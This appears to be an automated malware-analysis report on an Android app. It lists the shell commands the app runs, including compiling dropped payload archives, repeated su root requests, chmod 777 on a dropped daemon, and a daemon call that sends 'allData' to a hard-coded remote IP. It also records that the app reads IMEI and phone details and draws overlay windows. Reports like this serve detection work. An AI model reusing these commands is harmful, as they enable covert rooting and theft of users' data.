Executes the following shell scripts:
- /system/bin/dex2oat --runtime-arg -classpath --runtime-arg & --instruction-set=x86 --instruction-set-features=smp,ssse3,sse4.1,sse4.2,-avx,-avx2,-lock_add,popcnt --runtime-arg -Xrelocate --boot-image=/system/framework/boot.art --runtime-arg -Xms64m --runtime-arg -Xmx512m --instruction-set-variant=x86 --instruction-set-features=default --dex-file=/storage/emulated/0/Android/data/er/cr.zip --oat-fd=35 --oat-location=<Package Folder>/files/cr.dex --compiler-filter=speed
- /system/bin/dex2oat --runtime-arg -classpath --runtime-arg & --instruction-set=x86 --instruction-set-features=smp,ssse3,sse4.1,sse4.2,-avx,-avx2,-lock_add,popcnt --runtime-arg -Xrelocate --boot-image=/system/framework/boot.art --runtime-arg -Xms64m --runtime-arg -Xmx512m --instruction-set-variant=x86 --instruction-set-features=default --dex-file=/storage/emulated/0/Android/data/er/n.zip --oat-fd=36 --oat-location=/data/user/0/<Package>/files/n.dex --compiler-filter=speed
- /system/bin/log -p d -t su 10065 /system/bin/app_process32 executing 0 /system/bin/sh using binary /system/bin/sh : sh
- /system/bin/log -p d -t su child exited
- /system/bin/log -p d -t su client exited 0
- /system/bin/log -p d -t su connecting client 3706
- /system/bin/log -p d -t su connecting client 3814
- /system/bin/log -p d -t su connecting client 3932
- /system/bin/log -p d -t su connecting client 4029
- /system/bin/log -p d -t su connecting client 4062
- /system/bin/log -p d -t su connecting client 4063
- /system/bin/log -p d -t su connecting client 4220
- /system/bin/log -p d -t su connecting client 4334
- /system/bin/log -p d -t su db allowed
- /system/bin/log -p d -t su remote args: 1
- /system/bin/log -p d -t su remote pid: 3706
- /system/bin/log -p d -t su remote pid: 3814
- /system/bin/log -p d -t su remote pid: 3932
- /system/bin/log -p d -t su remote pid: 4029
- /system/bin/log -p d -t su remote pid: 4062
- /system/bin/log -p d -t su remote pid: 4063
- /system/bin/log -p d -t su remote pid: 4220
- /system/bin/log -p d -t su remote pid: 4334
- /system/bin/log -p d -t su remote pts_slave:
- /system/bin/log -p d -t su remote req pid: 3627
- /system/bin/log -p d -t su remote req pid: 3746
- /system/bin/log -p d -t su remote req pid: 3872
- /system/bin/log -p d -t su remote req pid: 3978
- /system/bin/log -p d -t su remote req pid: 4121
- /system/bin/log -p d -t su remote req pid: 4275
- /system/bin/log -p d -t su remote uid: 10065
- /system/bin/log -p d -t su sending code
- /system/bin/log -p d -t su starting daemon client 10065 10065
- /system/bin/log -p d -t su su invoked.
- /system/bin/log -p d -t su waiting for child exit
- /system/bin/log -p d -t su waiting for user
- /system/lib/arm/houdini /data/user/0/<Package>/files/daemon /data/user/0/<Package>/files/daemon -p <Package> -r am startservice --user 0 -n <Package>/system.moty.tools.MoServices -e key daemon -h http://52.11.99.233:7123/report/allData -m -i 4435
- chmod 777 /data/user/0/<Package>/files/daemon
- sh
- su
Uses the following algorithms to encrypt data:
Uses the following algorithms to decrypt data:
Uses elevated priveleges.
Gets information about network.
Gets information about phone status (number, IMEI, etc.).
Gets information about installed apps.
Adds tasks to the system scheduler.
Displays its own windows over windows of other apps.
Requests the system alert window permission.